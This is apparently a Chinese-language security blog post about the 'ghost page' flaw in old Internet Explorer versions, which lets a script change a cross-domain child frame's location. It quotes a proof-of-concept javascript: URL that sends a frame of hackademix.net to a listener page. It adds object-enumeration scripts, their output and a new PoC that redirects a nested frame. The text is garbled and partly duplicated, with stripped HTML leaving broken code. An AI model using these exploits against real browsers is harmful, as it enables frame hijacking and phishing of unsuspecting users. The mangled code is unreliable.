为了不落后,也学习下鬼页。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
x=open('http://planet.ph4nt0m.org/');
setTimeout(function(){allPrpos(x.frames[0])},5000);
</script>
结果:
除开 on开头的一些事件外,只有下面几个可以使用。
也就是说 POC代码中的x.frames[0].location 有据可依。我们继续测试下是否只有 '鬼页'的
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="
";
}
catch (ex)
{
props+= "
";
}
}
}
document.write(props+"
");
}
setTimeout(function(){allPrpos(document.frames[0].frames[0])},5000);
</script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问对象 location
新的POC:
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。
先看下POC
http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
代码:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);QZ说 这段代码展示了跨域操作location ,事实也是。
处于好奇和进一步发掘我们遍历了这个 ‘x’ 对象。
代码
<script language="javascript"> function allPrpos(obj) { // 遍历对象 var props = "
名称 | 值 |
"+p + " | " + obj[ p ] + " |
"+p + " | " +ex.message+" |
结果:
名称 | 值 |
onbeforeunload | null |
onafterprint | null |
top | [object] |
location | |
parent | [object] |
offscreenBuffering | Access is denied. |
frameElement | Access is denied. |
onerror | null |
screen | Access is denied. |
event | Access is denied. |
clipboardData | Access is denied. |
onresize | null |
defaultStatus | Access is denied. |
onblur | null |
window | [object] |
onload | null |
onscroll | null |
screenTop | Access is denied. |
onfocus | null |
Option | Access is denied. |
length | 0 |
onbeforeprint | null |
frames | [object] |
self | [object] |
clientInformation | Access is denied. |
XMLHttpRequest | Access is denied. |
external | Access is denied. |
screenLeft | Access is denied. |
opener | undefined |
onunload | null |
document | Access is denied. |
closed | false |
history | Access is denied. |
Image | Access is denied. |
navigator | Access is denied. |
status | Access is denied. |
onhelp | null |
name | Access is denied. |
top | [object] |
location | |
parent | [object] |
window | [object] |
length | 0 |
closed | false |
x.frames[0].location 可控制呢,简单修改下代码遍历 iframe 对象:
<script language="javascript"> function allPrpos(obj) { // 遍历对象 var props = "
名称 | 值 |
"+p + " | " + obj[ p ] + " |
"+p + " | " +ex.message+" |
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
同样得到可访问对象 location
top | [object] |
location | |
parent | [object] |
新的POC:
<script language="javascript"> setTimeout(function(){document.frames[0].frames[0].location=new location("//www.cncert.net")},5000); </script>
id="frm" src="http://planet.ph4nt0m.org/" width="80%" height="100%">
最后的测试结果是 在IE7/6 可以用本文提到的方式控制子frame的 location ,却无法执行伪协议,待进一步测试。